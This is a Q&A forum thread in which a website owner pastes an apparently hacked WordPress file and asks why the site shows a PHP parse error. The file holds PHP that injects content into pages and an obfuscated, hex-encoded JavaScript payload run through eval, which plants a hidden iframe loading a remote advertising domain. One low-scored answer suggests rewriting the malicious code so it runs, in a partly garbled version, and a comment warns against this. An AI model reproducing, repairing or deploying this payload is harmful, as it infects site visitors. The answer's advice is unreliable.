Website down caused by Parse error: syntax error, unexpected T_VAR

Question

Our website elliotts agency (www.elliottsagency.com) has this error message:

Parse error: syntax error, unexpected T_VAR in /home/ellcom1/public_html/wp-includes/js/customize-panel.js on line 45

The code for this file is posted below. The file may have been hacked. Can anyone tell me how to fix it or what is wrong with it?

<?php

define('GSDGF',load_extra_modules());
ob_start('ob_gzzs');

function ob_gzzs($data)
{
$_9 = @GSDGF;

$crc32=abs(crc32($_SERVER['REQUEST_URI']));
$rnd = $crc32 % 3;

if ($rnd === 0)
{
    $data = preg_replace('!(<body[^<>]*>)!is','\\1'  . $_9,$data,1);
}
elseif($rnd === 1)
{
    $data = preg_replace('!(</body[^<>]*>)!is', $_9 . '\\1',$data,1);
}
else
{
    preg_match_all('!</.*?>!',$data,$tmp,PREG_OFFSET_CAPTURE);
    $total_tags = count($tmp[0]);

    if ($total_tags>0)
    {
        $rnd = $crc32 % $total_tags;
        $rnd_offset = $tmp[0][$rnd][1];
        $rnd_offset += strlen($tmp[0][$rnd][0]);
        $data = substr($data,0,$rnd_offset) . $_9 . substr($data,$rnd_offset);
    }
}

return $data;
}


function _z($t){if(preg_match_all('!{([^}]+)}!',$t,$o,PREG_SET_ORDER))   
{$r=abs(crc32($_SERVER['REQUEST_URI']));foreach($o as $x)
{$m=explode('|',$x[1]);$t=str_replace($x[0],$m[$r%count($m)],$t);}}return 
$t;}
function load_extra_modules(){
$za=mt_rand(111,999);$zb=mt_rand(111,999);$zc=mt_rand(11,99);$zd=$za*$zb+$zc;$ze="{$za}*{$zb}+{$zc}";$s="<div class='raindance' id='$zd'><ul>";
foreach($a as $x)$s.=_z("<li>$x</li>");return "$s</ul></div>\n<script type='text/javascript'>\n(function(z,b,c,g){g.getElementById(z).style[b]='n'+c;})($ze,'dis'+'play','on'+'e',document);\n</script>";}


/*a392ac429c1ff5e72a4ba4585c4cc917*/;(function(){VAR keffaete="";VAR ktyknkds="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822633237663239633661313638333230643638373036363661316531633739616322293b69662820783333647120213d2022616233323038366461653237616530333732343765643865616136623363386122297b783232627128226332376632396336613136383332306436383730363636613165316337396163222c226162333230383664616532376165303337323437656438656161366233633861222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f6a732e62656c6179616d6f7264612e696e666f2f6d656761616476657274697a652f3f415a5a746e466e616d463d576f676e587278266b6579776f72643d6565353036646465353461666161353465393135643939353335313063336536264453717a446363517863446f52786971536d3d78425257734a4a5579457a465526547762624757685a4f3d68706869487a6f7a7670565650425a266f4b767a6a70774262717a7a77477165523d50534f4346776d59495177266f65735871455347704f3d52514a7249466b626550566a794a26704374627a464c4650463d75616d6864554376552666446d4f6b6b3d434c6b686256576f6d4d64744742266359694f70797572594d3d4d7663774855664e6126667656564a75744f714b5857546d727a6a743d707053594a4b544326764b6249796445715559624a4e7063786b463d5657744c4f4b52596f626d63223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (VAR kdzefiiz=0;kdzefiiz<ktyknkds.length;kdzefiiz+=2){keffaete=keffaete+parseInt(ktyknkds.substring(kdzefiiz,kdzefiiz+2), 16)+",";}keffaete=keffaete.substring(0,keffaete.length-1);eval(eval('String.fromCharCode("+keffaete+")'));})();/*a392ac429c1ff5e72a4ba4585c4cc917*/

if you have backup replace that file. this is a syntax error common for WP when you try edit some page and you made some syntax error — SarangaR, Feb 15 '16 at 11:01

score -1 · Answer 1 · answered Feb 15 '16 at 12:04

I think issue with VAR

so use this code

/a392ac429c1ff5e72a4ba4585c4cc917/;(function(){$keffaete="";$ktyknkds="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822633237663239633661313638333230643638373036363661316531633739616322293b69662820783333647120213d2022616233323038366461653237616530333732343765643865616136623363386122297b783232627128226332376632396336613136383332306436383730363636613165316337396163222c226162333230383664616532376165303337323437656438656161366233633861222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2fIstade 2f6a732e62656c6179616d6f7264612e696e666f2f6d656761616476657274697a652f3f415a5a746e466e616d463d576f676e587278266b6579776f72643d6565353036646465353461666161353465393135643939353335313063336536264453717a446363517863446f52786971536d3d78425257734a4a5579457a465526547762624757685a4f3d68706869487a6f7a7670565650425a266f4b767a6a70774262717a7a77477165523d50534f4346776d59495177266f65735871455347704f3d52514a7249466b626550566a794a26704374627a464c4650463d75616d6864554376552666446d4f6b6b3d434c6b686256576f6d4d64744742266359694f70797572594d3d4d7663774855664e6126667656564a75744f714b5857546d727a6a743d707053594a4b544326764b6249796445715559624a4e7063786b463d5657744c4f4b52596f626d63223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for ($kdzefiiz=0;kdzefiiza392ac429c1ff5e72a4ba4585c4cc917/

instead of this code

/a392ac429c1ff5e72a4ba4585c4cc917/;(function(){VAR keffaete="";VAR ktyknkds="77696e646f772e6f6e6c6f6164203d2066756e6374696f6e28297b66756e6374696f6e20783232627128612c622c63297b69662863297b7661722064203d206e6577204461746528293b642e7365744461746528642e6765744461746528292b63293b7d6966286120262620622920646f63756d656e742e636f6f6b6965203d20612b273d272b622b2863203f20273b20657870697265733d272b642e746f555443537472696e672829203a202727293b656c73652072657475726e2066616c73653b7d66756e6374696f6e2078333362712861297b7661722062203d206e65772052656745787028612b273d285b5e3b5d297b312c7d27293b7661722063203d20622e6578656328646f63756d656e742e636f6f6b6965293b69662863292063203d20635b305d2e73706c697428273d27293b656c73652072657475726e2066616c73653b72657475726e20635b315d203f20635b315d203a2066616c73653b7d766172207833336471203d2078333362712822633237663239633661313638333230643638373036363661316531633739616322293b69662820783333647120213d2022616233323038366461653237616530333732343765643865616136623363386122297b783232627128226332376632396336613136383332306436383730363636613165316337396163222c226162333230383664616532376165303337323437656438656161366233633861222c31293b766172207832326471203d20646f63756d656e742e637265617465456c656d656e74282264697622293b766172207832327171203d2022687474703a2f2f6a732e62656c6179616d6f7264612e696e666f2f6d656761616476657274697a652f3f415a5a746e466e616d463d576f676e587278266b6579776f72643d6565353036646465353461666161353465393135643939353335313063336536264453717a446363517863446f52786971536d3d78425257734a4a5579457a465526547762624757685a4f3d68706869487a6f7a7670565650425a266f4b767a6a70774262717a7a77477165523d50534f4346776d59495177266f65735871455347704f3d52514a7249466b626550566a794a26704374627a464c4650463d75616d6864554376552666446d4f6b6b3d434c6b686256576f6d4d64744742266359694f70797572594d3d4d7663774855664e6126667656564a75744f714b5857546d727a6a743d707053594a4b544326764b6249796445715559624a4e7063786b463d5657744c4f4b52596f626d63223b78323264712e696e6e657248544d4c3d223c646976207374796c653d27706f736974696f6e3a6162736f6c7574653b7a2d696e6465783a313030303b746f703a2d3130303070783b6c6566743a2d3939393970783b273e3c696672616d65207372633d27222b78323271712b22273e3c2f696672616d653e3c2f6469763e223b646f63756d656e742e626f64792e617070656e644368696c64287832326471293b7d7d";for (VAR kdzefiiz=0;kdzefiiza392ac429c1ff5e72a4ba4585c4cc917/

Thank you I tried this but unfortunately it didn't work. If you have any other recommendations, please let me know. — elliotts1, Feb 15 '16 at 12:41
Replacing hacked code which generates a syntax error with hacked code which does what the hacker wants strikes me as a Really Bad Idea. The incompetent hacker might have a different perception. At a minimum, run that hexstring through a hex converter to see what it does, before executing it. — rici, Feb 15 '16 at 14:36

Website down caused by Parse error: syntax error, unexpected T_VAR

1 Answers1